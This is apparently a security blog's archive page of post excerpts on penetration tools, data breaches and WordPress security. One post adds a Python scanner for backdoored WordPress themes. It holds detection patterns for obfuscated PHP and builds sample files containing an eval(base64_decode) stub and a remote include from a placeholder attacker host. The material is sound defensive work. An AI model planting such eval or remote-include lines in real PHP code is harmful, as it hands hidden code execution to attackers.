HD Moore recently announced a new post-exploitation tool offering Meterpreter sessions over HTTPS (or plain HTTP) that will traverse the corporate proxy. Variations on this have been available before but, for a number of reasons, have not been especially stable. Let's first look at a common locked-down corporate network. Then we will show how [...]
Data Breaches Visualized
Nathan from Flowing data has put together an excellent graphical representation of the largest data breaches of all time. Data was sourced from Dataloss DB. Sony has been having all sorts of data breach problems lately — namely a million passwords from the Sony Pictures site, 77 million accounts from the PlayStation Network, and nearly [...]
Hydra 6.4 Password Brute Forcer
The latest version of Hydra has been released with some bug fixes. Problems noted in my post comparing hydra with ncrack and medusa have been addressed, and after testing I can confirm these issues are no longer present.

CHANGELOG for 6.4
=================
* Update SIP module to extract and use external IP addr return from [...]
Malware in WordPress Themes
Found an interesting article over at OttoPress with some in-depth analysis of malware discovered in a theme on a less than reputable WordPress theme site. It seems there are some dodgy sites out there distributing infected themes, both free ones and ripped-off professional themes. Beware and check the reputation of your themes. It [...]
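Checking a theme's reputation is the first step; the second is reading its PHP before activating it. The script below is an added example, not code from the OttoPress article or from WordPress, and the indicators it looks for (a decoded or decompressed string fed straight to eval(), preg_replace() with the /e modifier, include/require of a URL, and very long base64 literals) are this example's own assumptions about what a backdoored theme typically carries. The sample theme it scans is constructed inline; the base64 payload in footer.php decodes to a harmless echo.

```python
"""Heuristic scan of a WordPress theme directory for obfuscated PHP backdoors.

Added example, not code from the article or from WordPress. The patterns are
assumptions about common indicators; a hit means "review this by hand", not
"this theme is infected".
"""
from __future__ import annotations

import re
import tempfile
from pathlib import Path

SUSPICIOUS_PATTERNS = {
    # A payload that is decoded/decompressed and then handed straight to eval().
    "eval_of_decoded_payload": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    # preg_replace() with the /e modifier evaluates the replacement as PHP.
    # Assumes '/' is used as the regex delimiter.
    "preg_replace_e_modifier": re.compile(
        r"preg_replace\s*\(\s*['\"]/[^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    # include/require of a URL pulls code from a server the theme author controls.
    "remote_include": re.compile(
        r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I),
    # A very long base64 literal is a common carrier for a hidden payload.
    "long_base64_literal": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

SCAN_SUFFIXES = {".php", ".inc", ".phtml"}


def scan_file(path: Path) -> list[tuple[str, int]]:
    """Return (indicator name, 1-based line number) for every hit in one file."""
    hits: list[tuple[str, int]] = []
    text = path.read_text(encoding="utf-8", errors="replace")
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits


def scan_theme(theme_dir: Path) -> dict[str, list[tuple[str, int]]]:
    """Scan every PHP-like file under theme_dir.

    Returns {relative POSIX path: hits} for files with at least one hit.
    """
    findings: dict[str, list[tuple[str, int]]] = {}
    for path in sorted(theme_dir.rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_SUFFIXES:
            hits = scan_file(path)
            if hits:
                findings[path.relative_to(theme_dir).as_posix()] = hits
    return findings


def build_sample_theme() -> Path:
    """Write a constructed sample theme: one clean file and two backdoored ones."""
    root = Path(tempfile.mkdtemp(prefix="theme-"))
    # Clean file: legitimate base64 use (inline image) must not be flagged.
    (root / "header.php").write_text(
        "<?php\n"
        "$logo = 'data:image/png;base64,' . base64_encode($png);\n"
        "?>\n<html><head><title><?php bloginfo('name'); ?></title></head>\n"
    )
    # Backdoor 1: payload decodes to echo "hello"; real infections carry a web shell.
    (root / "footer.php").write_text(
        "</body>\n"
        "<?php eval(base64_decode('ZWNobyAiaGVsbG8iOw==')); ?>\n"
        "</html>\n"
    )
    # Backdoor 2: remote include from an attacker-controlled host (hypothetical URL).
    (root / "inc").mkdir()
    (root / "inc" / "functions.php").write_text(
        "<?php\n"
        "include_once 'http://example.invalid/update.txt';\n"
        "?>\n"
    )
    return root


if __name__ == "__main__":
    for rel, hits in scan_theme(build_sample_theme()).items():
        for name, lineno in hits:
            print(f"{rel}:{lineno}: {name}")
```

Run it against a real theme with scan_theme(Path("/path/to/wp-content/themes/<theme>")). The eval() check deliberately requires the decode call to sit inside eval(); a bare base64_decode() is common in legitimate themes (inline images, options serialisation) and flagging it alone produces more noise than signal.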
w3af web application security testing framework stable released
The latest version of w3af has been released and it's a "stable" 1.0 release. To fire it up on Ubuntu only a couple of steps are required. Download the latest version from here: http://sourceforge.net/projects/w3af/files/

sudo apt-get install python-nltk python-soappy python-lxml python-svn python-scapy graphviz
tar jxvf w3af-1.0-stable.tar.bz2
./w3af_gui

The first thing to notice is the shiny [...]
Google Dorking WordPress
WordPress is very popular and easy to install. This very accessibility makes it a juicy target for those wanting to collect compromised hosting accounts for serving malicious content, spam, phishing sites, proxies and web shells. How prevalent is poor WordPress security? Our Web Tech Report showed that application updates to WordPress are reasonable. Let's try [...]
New WordPress Version Released 3.1.3
Hot on the heels of the release of our new WordPress Security Scanner is a new update to WordPress. The release includes multiple security fixes and hardening. Update your installations now. Various security hardening by Alexander Concha. Taxonomy query hardening by John Lamansky. Prevent sniffing out user names of non-authors by using canonical redirects. Props [...]